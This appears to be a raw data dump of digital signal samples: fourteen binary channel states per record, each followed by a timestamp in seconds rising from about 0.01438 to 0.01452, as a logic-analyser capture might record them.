1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381676e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4381724e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381748e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381756e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381796e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381820e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381848e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381872e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381900e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4381924e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381928e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4381972e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381996e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382048e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382448e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382648e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382848e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382900e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4382972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4382996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383048e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383448e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383648e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383848e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383900e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4383972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4383996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384048e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384448e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384648e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384848e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384900e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4384972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4384996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385048e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4385468e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4385492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4509980e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4510164e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510188e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,1.4510212e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510240e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.4510532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510560e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.4510564e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.4510604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.4510628e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510636e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.4510656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510680e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.4510684e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.4510732e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.4510756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.4510780e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.4510804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4510812e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4510856e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4510880e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4510888e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4510908e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.4510932e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4510936e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4510980e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511012e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511028e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511056e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511080e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511156e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511228e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511236e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4511280e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511308e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.4511312e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511356e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511360e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4511404e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511428e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511456e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511628e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511636e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4511680e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511712e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511756e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511760e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4511804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4511828e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4511956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4511980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512028e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512056e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512060e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4512108e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512228e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512256e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512280e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512308e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512356e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512404e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512428e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512456e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512460e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4512508e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512540e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512628e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512636e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4512680e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512708e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.4512712e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512756e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512780e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512804e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512828e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512856e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512880e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512908e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4512932e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4512956e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4512960e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513004e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513028e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513036e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513080e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513156e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513204e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513228e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513260e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513308e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513340e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513380e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513388e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513404e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513428e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513460e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513480e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513508e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513532e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513556e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513580e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513628e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513656e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513680e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513712e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513756e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513780e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513812e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.4513856e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.4513880e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513888e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4513956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4513980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514456e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4514956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4514980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515456e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4515956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4515980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.4516332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.4516356e-02 